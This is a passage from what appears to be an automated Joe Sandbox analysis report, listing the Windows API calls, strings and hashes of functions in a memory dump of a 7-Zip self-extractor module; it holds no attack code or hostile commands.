                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: 9ce87d3618841754b289e833f2129ab4342cf9214df92cd0b1523f3ce672331a
                                                                                                                                                                                                                                          • Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ce87d3618841754b289e833f2129ab4342cf9214df92cd0b1523f3ce672331a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 00412927
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: 7b467f4edc98581b48bf4a6afa053e8629786425d12130fb830a7fa7cf97d8b1
                                                                                                                                                                                                                                          • Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b467f4edc98581b48bf4a6afa053e8629786425d12130fb830a7fa7cf97d8b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: 49c7081fe57492d8dbfed043f0875de13a40989083cc347d4da349545cac1097
                                                                                                                                                                                                                                          • Instruction ID: 1b5e1ee4d6878524e1e94f3eb7038bf21a854c21e9593a8af651c0b03c199f54
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49c7081fe57492d8dbfed043f0875de13a40989083cc347d4da349545cac1097
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FED0A9312082203AEA5862320C119AF08884F40329B008C3FB802E62D1DE3ECE81429E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                                                                                                                          • Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                                                                                                                          • Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                          • Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                                                                                                                          • Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000000,?), ref: 00402541
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402551
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 0040260A
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00000000,00000002), ref: 0040262A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                          • String ID: 7zSfxString%d
                                                                                                                                                                                                                                          • API String ID: 2117570002-3906403175
                                                                                                                                                                                                                                          • Opcode ID: 1e66384528f8902588da61b39e4c791fa7c9fedd47d5a16bc49d7bfd503cfe5a
                                                                                                                                                                                                                                          • Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e66384528f8902588da61b39e4c791fa7c9fedd47d5a16bc49d7bfd503cfe5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B8), ref: 004092EE
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00409344
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00409359
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000), ref: 0040935C
                                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
                                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 0040939E
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004093A1
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00409411
                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00409414
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00409424
                                                                                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 00409427
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 0040943B
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040943E
                                                                                                                                                                                                                                            • Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1057135554-0
                                                                                                                                                                                                                                          • Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                                                                                                                          • Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                                                                                                                          • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                                                                                                                          • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402156
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402175
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040218D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                                                                                                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                                                                                                                          • API String ID: 2639302590-365843014
                                                                                                                                                                                                                                          • Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                                                                                                                          • Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 829399097-0
                                                                                                                                                                                                                                          • Opcode ID: 25bacde36afee5eda2010891542c634a4b56d274371cd47ec79054000a40c2cb
                                                                                                                                                                                                                                          • Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25bacde36afee5eda2010891542c634a4b56d274371cd47ec79054000a40c2cb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00408DDA
                                                                                                                                                                                                                                          • SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00408DF4
                                                                                                                                                                                                                                          • SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 00408E25
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentHookThreadWindows$Dialog
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1967849563-0
                                                                                                                                                                                                                                          • Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                                                                                                                          • Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
                                                                                                                                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
                                                                                                                                                                                                                                          • FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3429775523-0
                                                                                                                                                                                                                                          • Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                                                                                                                          • Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040556D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00405575
